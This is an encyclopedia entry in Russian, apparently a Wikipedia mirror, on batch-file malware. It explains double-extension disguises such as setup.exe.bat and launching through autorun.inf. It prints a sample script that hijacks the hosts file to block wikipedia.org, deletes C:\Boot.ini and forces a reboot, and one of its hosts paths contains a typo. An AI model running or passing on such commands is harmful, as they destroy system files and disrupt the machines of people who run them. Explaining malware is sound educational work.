- Bat вирус
-
Bat вирус, Batch Malware - вредоносное программное обеспечение, написанное на языке WinBatch. Имеют расширения .bat и .cmd. Чаще всего такие программы пишутся в программах Windows, таких как:
- Блокнот (Notepad)
- MS-WORD
- Cmd
Принцип работы вируса
Обычно вирусы BAT представляют как лицензионную программу, которая якобы является приложением. Расширение .bat в таких случаях не будет видно. Например: файл setup.exe.bat. Иногда бывает, что в архивы WINRar и ZIP вставляют несколько файлов. Ниже приведены примеры атрибутов файлов, которые могут быть в архиве:
- setup.exe.bat - якобы установочная программа.
- autorun.inf - скрытый, системный. Файл поможет запустить другой вредоносный объект.
- debug.exe.cmd - скрытый системный. Файл, который запустит setup.
Файлы BAT автоматически запускаться не могут. Для того, чтобы запустить файл, чаще всего используют файлы autorun.inf. Ниже приведён пример файла debug.exe.cmd:
start setup.exe.bat
Пример setup.exe.bat
@echo off title Setup color a cls echo Please wait... echo 127.0.0.1 wikipedia.org > %windir%\system32\drivers\ect\hosts echo 127.0.0.1 www.wikipedia.org >> %windir%\system32\drivers\etc\hosts cd \ attrib -h -s C:\Boot.ini del C:\Boot.ini shutdown -r
Категория:- Компьютерные вирусы
Wikimedia Foundation. 2010.